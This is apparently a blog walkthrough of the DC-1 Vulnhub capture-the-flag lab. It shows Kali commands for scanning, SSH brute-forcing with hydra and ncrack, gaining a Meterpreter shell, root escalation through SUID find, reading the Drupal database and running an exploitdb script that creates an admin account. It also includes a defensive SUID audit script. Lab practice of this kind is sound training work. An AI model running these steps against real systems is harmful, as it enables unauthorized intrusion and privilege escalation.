Want to practice the skills needed to build practical ethical hacking experience? Then read on. The exercise is to point Kali Linux at a test virtual machine with one purpose: to go from an unprivileged user to root. Even more importantly, the goal is not to take the easy way out. Resisting the natural urge to reach for Metasploit is a habit worth starting, which is why I document both approaches, with Metasploit and without, in this walkthrough. This is the DC-1 Vulnhub Kali Linux walkthrough.
Want to set up a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.
The DC-1 vulnhub image is a 32-bit Debian system with the Drupal CMS installed and running. With five flags to capture and read, there is plenty to do with this one. Afterwards I went back and kept reasoning about other ways the image could be exploited.
There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t need to log in as root to do this; you do, however, need root privileges.
Here’s What You Need
- DC-1 vulnerable machine from vulnhub. (VirtualBox)
- Kali Linux virtual machine. (VirtualBox)
The first step is to list the services running on the DC-1 vulnerable box. For this I use a variety of tools: nmap, netdiscover and nbtscan.
root@kali:~# nmap -sV 10.0.2.6
Brute-forcing the Running Services
Kali Linux already has tools installed for brute-forcing services on a target, among them hydra and ncrack.
root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh
root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6
One of the best nmap scans to run is to scan for service versions.
msf > db_nmap -sV -Pn 10.0.2.6
Using Netcat
netcat can act as a TCP server and as a TCP client. Note that -z only checks whether ports are listening, without sending data, and it needs at least one port on the command line; without one it reports "no port[s] to connect to", as shown below.
msf5 > nc -z 10.0.2.6
[*] exec: nc -z 10.0.2.6
no port[s] to connect to
msf5 > nc -nv 10.0.2.6
Using Metasploit to Hack DC-1
The right setup can save a lot of time later on, so I make it a habit to follow these steps every time I launch msfconsole. Running the scan with db_nmap stores the results in the database, so I can use the hosts and services commands later to list a formatted table of the data gathered so far.
# FOLLOW THESE DIRECTIONS!
# start the database server
root@kali:~# service postgresql start
root@kali:~# msfdb init
root@kali:~# msfconsole
# create workspace. -a for "add"
msf > workspace -a dc01
msf > workspace dc01
100644/rw-r--r-- 52 fil 2019-02-19 08:45:11 -0500 flag1.txt
# go to the mysql service location
cd /var/www/includes/database
# open a shell from meterpreter
meterpreter > shell
Next I look for files on the server that are owned by root and can be executed with root privileges. First, though, I use Python’s pty module to open a proper local bash shell. Technically, the pty module’s spawn method starts the named process and connects the parent process to the new one’s standard input and output through a pseudo-terminal. Here I run the Python code with the -c flag; in this syntax multiple statements are separated by a semicolon.
meterpreter > shell
Process 5291 created.
Channel 11 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www/$
Look for binaries that are owned by root and have the SUID bit set (-perm -4000), in the hope of running one of them as root.
find / -user root -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
Because /usr/bin/find is SUID root, its -exec action runs /bin/sh with root’s effective user ID.
www-data@DC-1:/var/www$ find . -exec '/bin/sh' \;
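From the defender’s side, the lesson of this section is that an SUID bit on a general-purpose tool like find should never survive a build review. The audit below is an added example, not part of the original walkthrough: it compares the SUID list captured from DC-1 above (embedded as constructed input) against an allowlist of SUID binaries expected on a stock Debian install. The allowlist is an assumption for illustration; on a real fleet it must come from your own build baseline.

```shell
#!/bin/sh
# Constructed input: the SUID binaries found on DC-1 with
# `find / -user root -perm -4000`, embedded so this runs offline.
DC1_SUID_LIST='/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find'

# Assumed baseline (illustrative allowlist): SUID root binaries a stock
# Debian install is expected to carry. Replace with your own build baseline.
EXPECTED_SUID='/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd'

# unexpected_suid LIST: print each path in LIST that is absent from the
# allowlist. grep -Fx matches the whole line literally, so /bin/ping does
# not also accept /bin/ping6.
unexpected_suid() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        printf '%s\n' "$EXPECTED_SUID" | grep -Fxq -- "$path" || printf '%s\n' "$path"
    done
}

# suid_audit_count LIST: number of unexpected SUID binaries; anything
# other than 0 means the host drifted from its baseline and needs review.
suid_audit_count() {
    unexpected_suid "$1" | wc -l | tr -d ' '
}

# Live use on a host (run as root so every directory is readable):
# unexpected_suid "$(find / -user root -perm -4000 -type f 2>/dev/null)"
```

Run against the DC-1 list it flags /usr/bin/procmail and /usr/bin/find; the second is the misconfiguration the walkthrough exploits.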
MySQL Database Hacking
Now that we have a bash shell on the local server let’s revisit the database access that we gained earlier.
mysql -u dbuser -p drupaldb
Enter password: R0ck3t
mysql> show databases;
mysql> use drupaldb;
mysql> show tables;
mysql> select * from users;
# Passwords everywhere!
mysql> exit;
I cracked the password hash found in /etc/shadow for the user flag4. The password is orange!
SSH Access Using Cracked Password
Using the password I cracked for the flag4 user I make a simple login to the DC-1 server.
Using hydra again, only this time cutting the computing time down drastically by supplying the correct username, flag4, instead of guessing it.
root@kali:~# hydra -l flag4 -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh
Or by using ncrack:
root@kali:~# ncrack -p 22 --user flag4 -P /usr/share/wordlists/rockyou.txt 10.0.2.6
Not Using Metasploit
Learn a new command: searchsploit! The exploits it indexes are stored under /usr/share/exploitdb and consist of PHP, Ruby, Python and other scripts.
These scripts can be run directly from Kali Linux against the same vulnerable Drupal server, no Metasploit required.
msf5 > python /usr/share/exploitdb/exploits/php/webapps/34992.py -t 10.0.2.6 -u hacker -p pass
[!] VULNERABLE!
[!] Administrator user created!
[*] Login: hacker
[*] Pass: pass
[*] Url: http://10.0.2.6/?q=node&destination=node